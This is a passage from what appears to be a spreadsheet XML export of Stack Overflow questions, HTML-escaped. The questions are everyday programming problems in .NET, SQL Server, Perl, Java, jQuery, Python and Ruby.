    <t xml:space="preserve">&lt;p&gt;I need to extract the icon from a windows shortcut (.lnk) file (or find the icon file, if it's just pointed to by the shortcut).&lt;/p&gt;
&lt;p&gt;I'm not asking about extracting icons from exe's, dll's, etc.  The shortcut in question is created when I run a installation program.  And the icon displayed by the shortcut is not contained in the .exe that the shortcut points to.  Presumably the icon is embedded in the .lnk file, or the .lnk file contains a pointer to where this icon lives.  But none of the utilities I've found work address this -- they all just go to the .exe.&lt;/p&gt;
&lt;p&gt;Many thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What happened to the python bindings for CGAL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I found the &lt;a href="http://www.cgal.org/"&gt;Computational Geometry Algorithms Library&lt;/a&gt; in my search for an algorithm to decompose a concave polygon into the minimum number of convex components.  Links off the site and numerous google results indicate there are python bindings for it, which would be really handy, but all the links are dead!  What happened to it?  Where can I get it now?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to remove html tags from database text field</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I remove html elements in a text field from SQL Server?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where to look for database samples/schema?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I found &lt;a href="http://www.databaseanswers.org/data_models/" rel="nofollow"&gt;http://www.databaseanswers.org/data_models/&lt;/a&gt; very useful. Any other suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I convert an audio stream to MP3 using Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible using Java to convert a real time audio stream from the mixer to MP3? &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It has to be converted chunk by chunk otherwise the memory will be exhausted. &lt;/li&gt;
&lt;li&gt;I already know how to record but only to lossless formats such as wav and aiff.  &lt;/li&gt;
&lt;li&gt;I need conversion as the audio comes in.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How to fix the "421 RP-001 The mail server IP connecting to Windows Live Hotmail server has exceeded the rate limit" problem?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We run a large online community in the Netherlands. Because of that we send a lot of mail to the hotmail email addresses of our members.
Recently we have noticed that not all mail is reaching our members, because we have hit a certain limit or so it seems.&lt;/p&gt;
&lt;p&gt;Google doesn't give a solution (yet) but we see a lot of others having the same problem.
Note, We have added (since long) SPF records for our domain, in TXT and SPF types.
What else can we do to tackle this problem?&lt;/p&gt;
&lt;p&gt;// Ryan&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Access rdlc elements from code behind file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;can you please give any sample code for accessing the rdlc elements from code behind file.&lt;/p&gt;
&lt;p&gt;I have a text box in the rdlc file, i have to set the value for that from code behind file. Please help me&lt;/p&gt;
&lt;p&gt;Thanks &lt;/p&gt;
&lt;p&gt;P S Marimuthu&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How about using FLEX 3 component inside Flash file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to use Flex 3  component/code inside Flash (cs4)  SWF file ?&lt;/p&gt;
&lt;p&gt;I know its possible in the opposite direction.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SystemSounds Play not working</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to play the Asterisk system sound from a C# program with&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.Media.SystemSounds.Asterisk.Play();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but no sound plays.  My system does have a sound set up for Asterisk and other programs (not written by me) cause various system sounds to play.&lt;/p&gt;
&lt;p&gt;Can anyone suggest any possible reasons for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IS CAML the only way to Query MOSS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;CAML is hard to learn, and dificult to use, is there a better way to get results from MOSS, besides using CAML queries? And not referring to the Web Services, which are slower, or the object model, which again is slower. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Selecting rows where first n-chars are equal (MySQL)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table with playerhandles, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1 - [N] Laka
2 - [N] James
3 - nor | Brian
4 - nor | John
5 - Player 2
6 - Spectator
7 - [N] Joe 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;From there I wanna select all players where the first n-chars match, but I don't know the pattern, only that it's the first n-chars. In the above example I wan't it to return rows 1,2,3,4 and 7.&lt;/p&gt;
&lt;p&gt;Is this possible and not too expensive to do in MySQL?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Yet another About ajax.net update panels performance thread</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Good day,&lt;/p&gt;
&lt;p&gt;we just moved from asp.net 1.1 to asp.net 2.0. We are using ajax update panels.&lt;/p&gt;
&lt;p&gt;In an Apress book (Pro asp.net 2008) , I've read that when you use the updatepanel, you don't reduce the acount of bandwidth sent, because the entire page is still sent. &lt;/p&gt;
&lt;p&gt;That in mind, I've also read on many websites that it is better to use multiple updatepanels instead of only one containing the entire page to 'reduce the amount of bandwidth sent'. In my opinion, there is a contradiction with the Apress book, and I was wondering what you guys think.&lt;/p&gt;
&lt;p&gt;Is it better to use only one updatepanel containing the entire page, or many ones? The performance is my main concern.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to determine total size of ASP.Net cache?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the ASP.net cache in a web project, and I'm writing a "status" page for it which shows the items in the cache, and as many statistics about the cache as I can find. Is there any way that I can get the total size (in bytes) of the cached data? The size of each item would be even better. I want to display this on a web page, so I don't think I can use a performance counter.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Disable Windows Mobile security features</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently writing an app for a Windows Mobile 5.0 app and it seems to possess some firewall-esqe feature where I need to permit the running of any deployed executable. Is there some kind of registry key I can use to turn this off during development as it's frustrating having to babysit the device.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Different output from midl.exe 6 and midl.exe 7</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm tyring to convert a MSVC project from VS 2005 to VS 2008. It contains a IDL file that outputs a header and stubs used for RPC.  The VS 2005 project uses MIDL.exe version 6.00.0366.  The VS 2008 project uses MIDL.exe version 7.00.0500.&lt;/p&gt;
&lt;p&gt;Here's the problem: MIDL v6 outputs the following prototype for me to implement in my server code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HRESULT PRC_Function(UINT input);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;MIDL v7 with the same command line outputs this prototype:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HRESULT RPC_Function(handle_t IDL_handle, UINT input);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I don't want to have to go through and add the handle_t parameter to all my existing implementations. (Plus I still need the implementations to compile with VS 2005 for a while longer.)&lt;/p&gt;
&lt;p&gt;Question: How can I get MIDL.exe v7 to output the same RPC server prototypes as v6?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Stored procedure to modify bit flag, can't use Enums since many apps will be modifying it, what should I do?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There is a column in a database that is of type INT (Sql server).&lt;/p&gt;
&lt;p&gt;This int value is used at a bit flag, so I will be AND'ing and OR'ing on it.&lt;/p&gt;
&lt;p&gt;I have to pass a parameter into my sproc, and that parameter will represent a specific flag item.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;I would normally use an enumeration and pass the int representation to the sproc&lt;/b&gt;, but since many different modules will be accessing it it won't be practicial for them all to have my enum definition (if it is changed, it will be a headache to roll it out).&lt;/p&gt;
&lt;p&gt;So should I use a 'string' or a magic-number as the parameter value, then in my sproc I will do:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;IF(@blah = 'approved')
BEGIN
      // bit banging here
END
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Why is January month 0 in Java Calendar?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In &lt;code&gt;java.util.Calendar&lt;/code&gt;, January is defined as month 0, not month 1. Is there any specific reason to that ?&lt;/p&gt;
&lt;p&gt;I have seen many people getting confused about that...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unit testing CLI/MFC Application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have CLI/MFC application and I would like to begin to learn how to unit test with it.  I have VS2008 Pro.  If possible, I would like to use the built in unit testing.  Thanks for your input!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Response.Flush not working ASP.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an aspx page where i am Processing a large number of records from a table and doing some manipulation.after each manipuation,(each record),I have a Response.Write("Record : "+rec);
Response.Flush()&lt;/p&gt;
&lt;p&gt;I have set Response.Buffer property to false.
It is working fine 
But If i want to render the output as a table row,its not working as of Response.Write
After fininshing all the records in the loop only , the table is getting printed&lt;/p&gt;
&lt;p&gt;How to solve this ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get which page threw an exception to Application_error in aspx</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a general exception handler, Application_error in my global.asax where I'm trying to isolate all the uncaught exceptions on all my many pages. I don't want to use Page_error to catch exception because it's inefficient to call that on so many pages. So where in the exception can I find what page actually caused the exception?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is $1 empty in my substitution?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to put the stuff within parentheses into the value of a src attribute in an img tag:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;while(&amp;lt;TOCFILE&amp;gt;)
{
    $toc_line = $_;
    $toc_line =~ s/&amp;lt;inlineFig.*?(\.\.\/pics\/ch09_inline99_*?\.jpg)*?&amp;lt;\/inlineFig&amp;gt;/&amp;lt;img src="${1}" alt="" \/\&amp;gt;/g;
    $new_toc_file .= $toc_line;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So I expected to see tags like this in the output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;img src="../pics/ch09_inline99_00" alt="" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But instead I'm getting:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;img src="" alt="" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Full-Time WPF Development</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am fortunate to be working for a company in which all of our new development efforts are all in WPF. Are there a lot of other developers out there in this situation? Are companies quickly adopting this as their primary UI platform? As developers we all see the value in it, but are companies buying into it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>$1 outputting no characters in regex</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A couple people just recommended removing the curly brackets from ${1}, but that didn't seem to change anything; still getting nothing for $1.&lt;/p&gt;
&lt;p&gt;I am trying to put the stuff within parentheses into the value of a src attribute in an img tag:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$toc_line =~ s!&amp;lt;inlineFig.*?(\.\./pics/ch09_inline99_*?\.jpg)*?&amp;lt;/inlineFig&amp;gt;!&amp;lt;img src="$1" alt="" /&amp;gt;!g;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The img tags still come out with src="" instead of, eg, src="../pics/ch09_inline99_00".&lt;/p&gt;
&lt;p&gt;Thx&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Please add information to your existing question&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Duplicate:&lt;/strong&gt; &lt;a href="http://stackoverflow.com/questions/344460/1-outputting-no-characters-in-regex-output"&gt;http://stackoverflow.com/questions/344460/1-outputting-no-characters-in-regex-output&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>gwt-ext file upload</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to do a file upload from gwt-ext without bringing up the dialog box. To do this, I created a FormPanel and added the appropriate fields to it. Then did a form.submit(). This doesn't seem to work. Any idea why? The code is shown below.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;final FormPanel uploadForm = new FormPanel();
uploadForm.setVisible(false);
uploadForm.setFileUpload(true);
final TextField sourceFile = new TextField("File", "sourceFile");
sourceFile.setVisible(false);
sourceFile.setInputType("file");
sourceFile.setValue("/tmp/test.txt");
final TextField targetFile = new TextField("Upload As", "targetFile");
targetFile.setVisible(false);
targetFile.setValue("different.txt");
uploadForm.add(sourceFile);
uploadForm.add(targetFile);
final String url = GWT.getModuleBaseURL() + "/uploadFile";
uploadForm.getForm().submit(url, null, Connection.POST, null, false);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tested the servlet on the server side with a simple html form and it works correctly. Only the GWT-EXT version doesn't seem to work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Issue with Self Signed Cert in WCF - Must have Private Key</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating a WCF service hosted within IIS7 on Windows Vista SP1. I am getting the following error:&lt;/p&gt;
&lt;p&gt;The certificate 'CN=SignedByLocalHost' must have a private key that is capable of key exchange. The process must have access rights for the private key. &lt;/p&gt;
&lt;p&gt;It looks like I would need to give the host process assess to the certificate which was done in the past with winhttpcertcfg which has been deprecated for Vista. The article I found indicates to use the certificate console, but I am missing somethign because I don't see any capability to edit my cert. &lt;/p&gt;
&lt;p&gt;Any help would be great!&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ignore ObsoleteAttribute Compiler Error</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an enumeration value marked with the following attribute.  The second parameter instructs the compiler to error whenever the value is used.  I want this behavior for anyone that implements my library, but I need to use this enumeration value within my library.  How do I tell the compiler to ignore the Obsolete error for the couple of uses in my library.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public enum Choices
{
    One,
    Two,
    [ObsoleteAttribute("don't use me", true)] 
    Three,
    Four
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Solution (Thanks everyone)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class EnumHack
{
  static EnumHack()
  {
    // Safety check
    if (Choices!= (Choices)Enum.Parse(typeof(Choices), "Three"))
      throw new Exception("Choices.Three != 3; Who changed my Enum!");
  }
  [Obsolete("Backwards compatible Choices.Three", false)]
  public const Choices ChoicesThree = (Choices)3;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Good algorithm for combining items from N lists into one with balanced distribution?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have the three following lists&lt;/p&gt;
&lt;p&gt;A1&lt;br /&gt;
A2&lt;br /&gt;
A3  &lt;/p&gt;
&lt;p&gt;B1&lt;br /&gt;
B2&lt;/p&gt;
&lt;p&gt;C1&lt;br /&gt;
C2&lt;br /&gt;
C3&lt;br /&gt;
C4&lt;br /&gt;
C5  &lt;/p&gt;
&lt;p&gt;I'd like to combine them into a single list, with the items from each list as evenly distributed as possible sorta like this:&lt;/p&gt;
&lt;p&gt;C1&lt;br /&gt;
A1&lt;br /&gt;
C2&lt;br /&gt;
B1&lt;br /&gt;
C3&lt;br /&gt;
A2&lt;br /&gt;
C4&lt;br /&gt;
B2&lt;br /&gt;
A3&lt;br /&gt;
C5&lt;/p&gt;
&lt;p&gt;I'm using .NET 3.5/C# but I'm looking more for how to approach it then specific code.&lt;/p&gt;
&lt;p&gt;EDIT: I need to keep the order of elements from the original lists.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I extract a file from a jar that is 3 directories deep?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a jar file that has a file named "client.ts" in (when viewing in ZipGenius) "/com/something/messaging". When I do &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;JarFile jarFile = new JarFile("Client.jar");
JarEntry zipFile = jarFile.getJarEntry("client.ts");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It can't find the "client.ts" file. If I package the file in "/resources/" instead it can find it. Does &lt;code&gt;JarFile.getEntry()&lt;/code&gt; only drill down one directory? The javadoc for &lt;a href="http://java.sun.com/javase/6/docs/api/java/util/jar/JarFile.html#getJarEntry(java.lang.String)" rel="nofollow"&gt;&lt;code&gt;getJarEntry()&lt;/code&gt;&lt;/a&gt; simply says: Returns the &lt;code&gt;ZipEntry&lt;/code&gt; for the given entry name or null if not found.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Enterprise Messaging API with Web Services for High Performance?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does combining an Enterprise Messaging solution with Web Services result in a real performance gain over simple HTTP requests over sockets?&lt;/p&gt;
&lt;p&gt;(if implementation details will help, interested in JMS with a SOAP webservice)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do I need to unsubscribe from (manually subscribed to) events in asp.net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do the same best practis rules regarding subscribing/unsubscribing to events apply in asp.net?&lt;/p&gt;
&lt;p&gt;I know it might seem like a silly question, but when I think about it, I have never really seen any code where people first subscribe to an event on a page and then unsubscribe later on in the web request.&lt;/p&gt;
&lt;p&gt;Example 1:
On a page, in the Page_Load method, I subscribe to a updating event on a ListView. Should I unsubscribe from that event later on, for example in the OnPreRenderComplete method?&lt;/p&gt;
&lt;p&gt;Example 2:
In the passive view patter, a view (Page control/Usercontrol) will raise an event whenever it needs the presenter to do anything. So the presenter needs to subscribe to events on the view, but do it also need to unsubscribe from the events again?&lt;/p&gt;
&lt;p&gt;Best regards, Egil.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to manage NHibernate sessions in a long lived Windows forms application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are using NHibernate to manage our persistence in a complex modular windows forms application - but one thought keeps bothering me. We currently open a session on launch and open all objects through that session. I am worried that all loaded objects get loaded into the NHibernate session cache, so that they cant be garbage collected, and ultimately we will end up with the whole database in memory.&lt;/p&gt;
&lt;p&gt;This never happens with web applications because web page requests (and even better Ajax requests) represent the perfect short lived transaction so a session can be opened and closed to handle each request.&lt;/p&gt;
&lt;p&gt;However if I load an tree of objects in my forms application and put then into a navigation pane on the screen they may stay their for the life of the application - and at any point the user may click on them, resulting in our code needing to navigate the object relationships to other objects (which only works within an NHibernate session).&lt;/p&gt;
&lt;p&gt;What do StackOverflow readers do to keep the benefits of NHibernate without the issues I describe?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Access a custom .NET DLL in VBScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wrote a DLL in .NET and I want to access it in VBScript. I don't want to add it to the assembly directory. &lt;/p&gt;
&lt;p&gt;Is there a way to point too the DLL and create an instance of it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Bayesian networks tutorial</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;for a beginner, which is the best book to start with for studying Bayesian Networks? &lt;/p&gt;
&lt;p&gt;Thanks,
Lucian&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server 2005 deadlock on key</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table with a clustered primary key index on a uniqueidentifier column. I have a procedure that runs the following psuedo functions:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;begin transaction
read from table 1
insert into table 2
update table 1 with pointer to table 2 record
commit transaction
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This all works fine until the same procedure is executed concurrently from elsewhere. Once this happens, one of the executions gets deadlocked and terminated every single time on the primary key.&lt;/p&gt;
&lt;p&gt;Any idea what I can do to prevent this, short of simply saying "don't run it concurrently"? The transactions are currently running in READ COMMITTED isolation level.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>System.EngineExecutionException on a return from a WCF service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This one has us all baffled at work. We have two services running on .net 3.5 SP1 that hits up sharepoint, and return Lists of model objects that are pretty similar. One of them works fine, the other throws an EngineExecutionException on the return.&lt;/p&gt;
&lt;p&gt;I know that is sort of vague, but everything executes fine right up until that point. When you look at the List in the debugger, everything looks pretty normal.&lt;/p&gt;
&lt;p&gt;Has anyone had this happen before? If so, what did you do to work around it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server 2005 - Enabling both Named Pipes &amp; TCP/IP protocols?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a SQL Server 2005 database, and currently all our users are connecting to the database via the TCP/IP protocol. &lt;/p&gt;
&lt;p&gt;The SQL Server Configuration Manager allows you to "enable" both Named Pipes, and TCP/IP connections at the same time. Is this a good idea? My question is not whether we should use named pipes instead of TCP/IP, but are there problems associated with enabling both?&lt;/p&gt;
&lt;p&gt;One of our client's IT guys, says that enabling database communication with both protocols will limit the bandwidth that either protocol can use - to like 50% of the total. I would think that the bandwidth that TCP/IP could use would be directly tied (inversely) to the amount of traffic that Named Pipes (or any of the other types of traffic) were occupying on the network at that moment. However, this IT person is indicating that the fact that we have enabled two protocols on the server, artificially limits the bandwidth that TCP/IP can use. Is this correct?&lt;/p&gt;
&lt;p&gt;I did Google searches but could not come up with an answer to this question. Any help would be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to disable a select box not inside a form?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can't seem to be able to disable a select box when the select tag is not nested inside a form tag.  Some things I tried are (using Firefox 3):
(via Jquery)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("#mySelect").attr("disabled", true);
$("#mySelect").attr("disabled", "disabled");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(also)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;document.getElementById('mySelect').disabled = true;
document.getElementById('mySelect').disabled = true;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is the HTML:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;select id="mySelect" onchange="updateChoice();"&amp;gt;
&amp;lt;option value="1"&amp;gt;First&amp;lt;/option&amp;gt;
&amp;lt;option value="2" selected=""&amp;gt;Second&amp;lt;/option&amp;gt;
&amp;lt;/select&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Must I have this select box inside a form element?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I connect to a IBM 3770 Remote Job Entry system for Customs Border Patrol 10+2 Security Filing from Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a project to submit the new 10+2 Security Filing data to Customs &amp;amp; Border Patrol (as required by DHS). Anyone else doing this? I need to be able to submit our data files via a IBM 3770 style Remote Job Entry gateway using Job Control Language and all the old junk. &lt;/p&gt;
&lt;p&gt;Question is this: Is there a Java API that will handle the IBM 3770 aspect? Perhaps I will be building one in this project...&lt;/p&gt;
&lt;p&gt;This sooo reminds me of my old COBOL days. Never thought I'd be doing JCL again... &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Remove all but the last 500,000 bytes from a file with the STL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our logging class, when initialised, truncates the log file to 500,000 bytes. From then on, log statements are appended to the file.&lt;/p&gt;
&lt;p&gt;We do this to keep disk usage low, we're a commodity end-user product.&lt;/p&gt;
&lt;p&gt;Obviously keeping the first 500,000 bytes is not useful, so we keep the last 500,000 bytes.&lt;/p&gt;
&lt;p&gt;Our solution has some serious performance problem. What is an efficient way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Interacting with jQuery plugin objects after their creation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a ticker which items are updated using polling. I have written a simple jQuery plugin for the ticker which is invoked like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("#cont ul").ticker();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which turns a ul into a ticker, scrolling through the li. To add new items I have to add lis to the ul, which works fine. However, the OO in me wishes I could have an addItem function on a ticker object. However, I don't want to lose the chainability that jQuery uses.&lt;/p&gt;
&lt;p&gt;Is there some method which is more obvious than adding ul's to the list but that fit's with the jQuery way of doing things?&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Should enums have uninitialized values . </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We were having a debate if enums should have uninitialized values.  For example.  We have &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public enum TimeOfDayType
{
   Morning
   Afternoon
   Evening
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or   &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public enum TimeOfDayType
{
   None
   Morning
   Afternoon
   Evening
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I think that there shouldn't be any none but then you have to default to some valid value on initialization.  But others thought there should be some indication of uniitized state by having another enum that is None or NotSet.&lt;/p&gt;
&lt;p&gt;thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to limit transfer rate using HttpHandler</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm programming a file transfer handler with speed limit feature, the rate based on user level. How do I control/calculate transfer rate in HttpHandler?.&lt;/p&gt;
&lt;p&gt;Some asp.net resource tell me that use Thread.Sleep will block asp.net thread pool.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Need skeleton code to call Excel VBA from PythonWin</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to invoke a VBA macro within an Excel workbook from a python script.  Someone else has provided the Excel workbook with the macro.  The macro grabs updated values from an external database, and performs some fairly complex massaging of the data.  I need the results from this massaging, and I don't really want to duplicate this in my Python script, if I can avoid it.  So, it would be great if I could just invoke the macro from my script, and grab the massaged results.&lt;/p&gt;
&lt;p&gt;Everything I know about COM I learned from "Python Programming on Win32".  Good book, but not enough for my task at hand.  I searched, but haven't found any good examples on how to do this.  Does anyone have any good examples, or perhaps some skeleton code of how to address/invoke the VBA macro?  A general reference (book, web link, etc) on the Excel COM interfaces would also help here.  Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Efficient Methods for a Life Simulation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Having read up on quite a few articles on Artificial Life (A subject I find very interesting) along with several questions right here on SO, I've begun to toy with the idea of designing a (Very, very, very) simple simulator. No graphics required, even. If I've overlooked a question, please feel free to point it out to me.&lt;/p&gt;
&lt;p&gt;Like I said, this will hardly be a Sims level simulation. I believe it will barely reach "acceptable freeware" level, it is simply a learning exercise and something to keep my skills up during a break. The basic premise is that a generic person is created. No name, height or anything like that (Like I said, simple), the only real thing it will receive is a list of "associations" and generic "use", "pick up" and "look" abilities.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;My first question&lt;/strong&gt; is in regards to the associations. What does SO recommend as an efficient way to handle such things? I was thinking a multimap, with the relatively easy set up of the key being what it wants (Food, eat, rest, et cetera) and the other bit (Sorry, my mind has lapsed) being what it associates with that need.&lt;/p&gt;
&lt;p&gt;For example, say we have a fridge. The fridge contains food (Just a generic base object). Initially the person doesn't associate fridge with food, but it does associate food with hunger. So when its hunger grows it begins to arbitrarily look for food. If no food is within reach it "uses" objects to find food. Since it has no known associations with food it uses things willy-nilly (Probably looking for the nearest object and expanding out). Once it uses/opens the fridge it sees food, making the connection (Read: inserting the pair "food, fridge") that the fridge contains food.&lt;/p&gt;
&lt;p&gt;Now, I realise this will be far more complex than it appears, and I'm prepared to hammer it out. The question is, would a multimap be suitable for a (Possibly) exponentially expanding list of associations? If not, what would be?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The second question&lt;/strong&gt; I have is probably far easier. Simply put, would a generic object/item interface be suitable for most any item? In other words, would a generic "use" interface work for what I intend? I don't think I'm explaining this well.&lt;/p&gt;
&lt;p&gt;Anyway, any comments are appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to capture events from a dynamically created button control in asp.net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can a program capture &lt;del&gt;generates&lt;/del&gt; events from a dynamically created button control in asp.net?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Read file object as string in python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using &lt;code&gt;urllib2&lt;/code&gt; to read in a page. I need to do a quick regex on the source and pull out a few variables but &lt;code&gt;urllib2&lt;/code&gt; presents as a file object rather than a string.&lt;/p&gt;
&lt;p&gt;I'm new to python so I'm struggling to see how I use a file object to do this. Is there a quick way to convert this into a string?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Ruby, can you perform string interpolation on data read from a file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Ruby you can reference variables inside strings and they are interpolated at runtime.  &lt;/p&gt;
&lt;p&gt;For example if you declare a variable &lt;code&gt;foo&lt;/code&gt; equals &lt;code&gt;"Ted"&lt;/code&gt; and you declare a string &lt;code&gt;"Hello, #{foo}"&lt;/code&gt; it interpolates to &lt;code&gt;"Hello, Ted"&lt;/code&gt;.  &lt;/p&gt;
&lt;p&gt;I've not been able to figure out how to perform the magic &lt;code&gt;"#{}"&lt;/code&gt; interpolation on data read from a file.  &lt;/p&gt;
